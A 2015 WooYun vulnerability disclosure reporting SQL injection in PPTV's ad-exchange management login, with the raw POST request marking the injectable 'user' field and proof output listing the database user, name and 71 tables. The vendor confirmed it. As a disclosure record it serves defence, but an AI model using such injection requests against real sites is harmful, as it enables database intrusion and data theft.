当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130181

漏洞标题:PPTV某站点MySQL注射

相关厂商:PPTV(PPlive)

漏洞作者: lijiejie

提交时间:2015-07-29 13:53

修复时间:2015-09-14 11:12

公开时间:2015-09-14 11:12

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-29: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

PPTV某站点MySQL注射

详细说明:

PPADX 广告交易平台管理系统
http://e.pptv.com/toro/login;jsessionid=52676FCA566BB6D7B9EDF563A4A7CB51?#
注射点:

POST /toro/login.do HTTP/1.1
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://e.pptv.com
Cookie: JSESSIONID=BBCDE8AE2C2D45207324D61063B806E9
Host: e.pptv.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
password=098f6bcd4621d373cade4e832627b4f6&salt=8Vp69WmEUQMrEYkd&user=test*


user可注入。

漏洞证明:

current user:    'pp_ad_openplat@10.%'
current database: 'pplive_ad_openplatform'
Database: pplive_ad_openplatform
[71 tables]
+--------------------------+
| ad_system_variable |
| adx_advertiser |
| adx_creative |
| adx_data_area |
| adx_dsp |
| adx_dsp_config |
| adx_dsp_position |
| adx_floorprice |
| adx_floorprice_position |
| adx_op_log |
| adx_position |
| adx_realtime_dsp_201503 |
| adx_realtime_dsp_201504 |
| adx_realtime_dsp_201505 |
| adx_realtime_dsp_201506 |
| adx_realtime_dsp_201507 |
| adx_realtime_dsp_201508 |
| adx_realtime_dsp_201509 |
| adx_realtime_dsp_201510 |
| adx_realtime_dsp_201511 |
| adx_realtime_dsp_201512 |
| adx_realtime_ssp_201503 |
| adx_realtime_ssp_201504 |
| adx_realtime_ssp_201505 |
| adx_realtime_ssp_201506 |
| adx_realtime_ssp_201507 |
| adx_realtime_ssp_201508 |
| adx_realtime_ssp_201509 |
| adx_realtime_ssp_201510 |
| adx_realtime_ssp_201511 |
| adx_realtime_ssp_201512 |
| adx_ssp |
| adx_sys_permission |
| adx_sys_role |
| adx_sys_role_permission |
| adx_sys_user |
| adx_sys_user_role |
| adx_zone |
| adx_zone_dsp |
| dsp_campaign |
| dsp_campaign_day |
| dsp_campaign_group |
| dsp_campaign_stat |
| dsp_cash_account |
| dsp_cash_change |
| dsp_cash_pay |
| dsp_cash_recharge |
| dsp_customer_invoice |
| dsp_daat_human |
| dsp_product |
| dsp_realtime_deal_201506 |
| dsp_realtime_deal_201507 |
| dsp_realtime_deal_201508 |
| dsp_realtime_deal_201509 |
| dsp_realtime_deal_201510 |
| dsp_realtime_deal_201511 |
| dsp_realtime_deal_201512 |
| dsp_stat_data_201506 |
| dsp_stat_data_201507 |
| dsp_stat_data_201508 |
| dsp_stat_data_201509 |
| dsp_stat_data_201510 |
| dsp_stat_data_201511 |
| dsp_stat_data_201512 |
| dsp_stat_data_201601 |
| dsp_stat_data_201602 |
| dsp_stat_data_201603 |
| dsp_stat_data_201604 |
| dsp_stat_data_201605 |
| dsp_stat_data_201606 |
| dsp_taxpayer_info |
+--------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 lijiejie@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-31 11:10

厂商回复:

谢谢关注,正在修复中

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-14 11:25 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    扫描器真厉害

  2. 2015-09-16 11:15 | 高飞 ( 路人 | Rank:2 漏洞数:1 | 新人请多多关照)

    求字典,